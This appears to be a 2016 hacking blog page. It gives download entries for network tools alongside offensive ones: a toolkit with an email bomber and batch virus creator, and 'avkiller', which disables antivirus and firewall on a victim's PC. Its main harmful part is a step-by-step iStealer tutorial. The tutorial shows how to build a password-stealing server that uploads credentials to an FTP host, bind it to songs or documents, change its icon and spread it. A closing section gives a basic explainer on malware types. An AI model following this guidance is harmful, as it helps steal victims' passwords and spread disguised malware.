Friday, 22 April 2016

TCP dump

Tcpdump is the classic IP sniffer which requires fewer system resources. It is great for tracking down network problems or monitoring activity.

Download

wireshark

Wireshark is a open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can browse the capture data delving down into just the level of packet detail you need. Wireshark has many powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.

Download

SMAC mac addresse changer

SMAC is easy to use MAC Address Changer for Windows systems network card manufacturers allow this option or not.

  •     Automatically Activate MAC Address after changing
  •     display the manufacturer of the MAC Address
  •     Generate any New MAC Address based on a selected manufacturer
  •     Preload MAC Addresses List n choose the new MAC address from the list.
  •     IPConfig button click to display network adapter  info to confirm changes
  •     Userfriendly GUI
Download

swiss

Swiss Army Knife is software and program which hav ability to perform  tasks of our pc like logoff, shutdown opening Task Manager internet explorer and firefox. It also has builtin hacking tools like Port Scanner Email Bomber Facebook Freezer IM Spammer and also a Batch Virus creator.

Download

Or

Here

Av killer

avkiller is software used to bypas firewall, antivirus and many security related programs and softwres services on victim pc. Once the program is executed, avkiller software will run in background and start killing all security  tasks on victim pc. These tasks include firewall, antivirus, windows defender and various other services.

Download

Or

Here

Istraler

istealer

This is tutorial specially for that people who are know lil bit about configure a stealers server.

before start we need to sign up a ftp service i recomended this site
http://www.drivehq.com

STEP 1

 Get the staeler from following link 

STEP 2

Run application and extract it
Click on "iStealer".
IF YOU GET ERROR MISSING COMDLG32.OCX 
Downloaded the missing OCX extract it into WINDOWS>SYSTEM32

STEP 3 ( Create server for steal passwords )

 Host copy and paste this "ftp.drivehq.com"
Username enter your drivehq.com username.
Password enter your drivehq.com password.

After this if you want to bind your server(password stealer)
with another application, song, document, picture etc. Click "bind with another file" and chose what file U want 2 bind your server with ... Also you can cahnge icon and thn buildserver. After make compress it and upload and spread where u want

Most harmful viruses



 All of us have heard already about VIRUS , WORMS , TROJANS and SPYWARES but only few ones know the difference b/w them. As usually we considerd every detected thing by antiviruses as VIRUS but its not a case. The antiviruses not only save us from viruses but also protects us from Trojans , Worms and Spywares. All can be dangerous for your computers . Today i'll tell about difference them

VIRUS 
 A virus is a self replication program and software which is attached to an executeable  
 files. When file is opened or executed the virus automatically gets executed and enter into system memory .when enters it searches for other files that can be infected or stays in the background and infect the files that are uses the virus infected program.
Worms
Worms are very similar to viruses but differ in way that they don't bind themselves to executable files instead  to replicate themselves they uses the network.If you find excessive use of your network bandwidth then you may be infected by a worm.So,a worm donot require a user to execute any file for its execution it can work without user intervention.
Trojan Horse

A trojan horse is harmful program which may seem harmless to the user before its installation but instead it is programmed or reverse engineered to  facilitate unauthorised remote access to the computer.Trojan’s donot replicate themselves.
Spyware
A spyware is a program and software that secretly monitors and collects pieces of information.They usually run in stealth mode and cannot be detected easily.Keyloggers is a great example of spyware software.There are not limited to just spying but can also send data to remote computers.

Here is the list of names of most harmful virus and worms in the history of computers
  •  Storm Worm
  •  Leap-A/Oompa- A
  •  Sasser and Netsky
  •  MyDome (Novarg)
  •  SQL Slammer / Sapphire
  •  Nimda
  •  Code Red and Code Red II
  •  The Klez
  •  ILOVEYOU
  •  Melissa